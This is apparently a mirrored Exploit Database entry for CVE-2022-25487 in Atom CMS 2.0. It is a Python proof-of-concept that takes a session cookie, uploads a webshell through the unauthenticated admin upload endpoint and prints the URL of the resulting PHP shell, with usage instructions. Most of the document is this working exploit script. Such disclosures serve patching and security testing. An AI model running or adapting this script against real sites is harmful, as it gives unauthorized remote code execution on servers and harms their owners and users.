Atom CMS 2.0 – Remote Code Execution (RCE)

• Exploit Database
• 16 阅读

• 作者： Ashish Koli
  日期： 2022-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50840/

• # Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)
  # Date: 22.03.2022
  # Exploit Author: Ashish Koli (Shikari)
  # Vendor Homepage: https://thedigitalcraft.com/
  # Software Link: https://github.com/thedigicraft/Atom.CMS
  # Version: 2.0
  # Tested on: Ubuntu 20.04.3 LTS
  # CVE: CVE-2022-25487
  
  # Description
  This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell.
  
  # Usage : python3 exploit.py <IP> <Port> <atomcmspath>
  # Example:python3 exploit.py 127.0.0.1 80 /atom
  
  # POC Exploit: https://youtu.be/qQrq-eEpswc
  # Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link:
  # https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC
  
  '''
  Description:
  A file upload functionality in Atom CMS 2.0 allows any
  non-privileged user to gain access to the host through the uploaded files,
  which may result in remote code execution.
  '''
  
  #!/usr/bin/python3
  '''
  Import required modules:
  '''
  import sys
  import requests
  import json
  import time
  import urllib.parse
  import struct
  import re
  import string
  import linecache
  
  
  
  proxies = {
   'http': 'http://localhost:8080',
   'https': 'https://localhost:8080',
  }
  
  '''
  User Input:
  '''
  target_ip = sys.argv[1]
  target_port = sys.argv[2]
  atomcmspath = sys.argv[3]
  
  
  '''
  Get cookie
  '''
  session = requests.Session()
  link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'
  response = session.get(link)
  cookies_session = session.cookies.get_dict()
  cookie = json.dumps(cookies_session)
  cookie = cookie.replace('"}','')
  cookie = cookie.replace('{"', '')
  cookie = cookie.replace('"', '')
  cookie = cookie.replace(" ", '')
  cookie = cookie.replace(":", '=')
  
  '''
  Upload Webshell:
  '''
  # Construct Header:
  header1 = {
  'Host': target_ip,
  'Accept': 'application/json',
  'Cache-Control': 'no-cache',
  'X-Requested-With': 'XMLHttpRequest',
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
  'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',
  'Origin': 'http://' + target_ip,
  'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',
  'Accept-Encoding': 'gzip, deflate',
  'Accept-Language': 'en-US,en;q=0.9',
  'Cookie': cookie,
  'Connection': 'close',
  
  }
  
  
  # loading Webshell payload: 
  path = 'shell.txt'
  fp = open(path,'rb')
  data= fp.read()
  
  
  # Uploading Webshell:
  link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'
  upload = requests.post(link_upload, headers=header1, data=data)
  
  p=upload.text
  x = re.sub("\s", "\n", p)
  y = x.replace("1<br>Unknown", "null")
  z = re.sub('[^0-9]', '', y)
  
  '''
  Finish:
  '''
  print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')
  print('')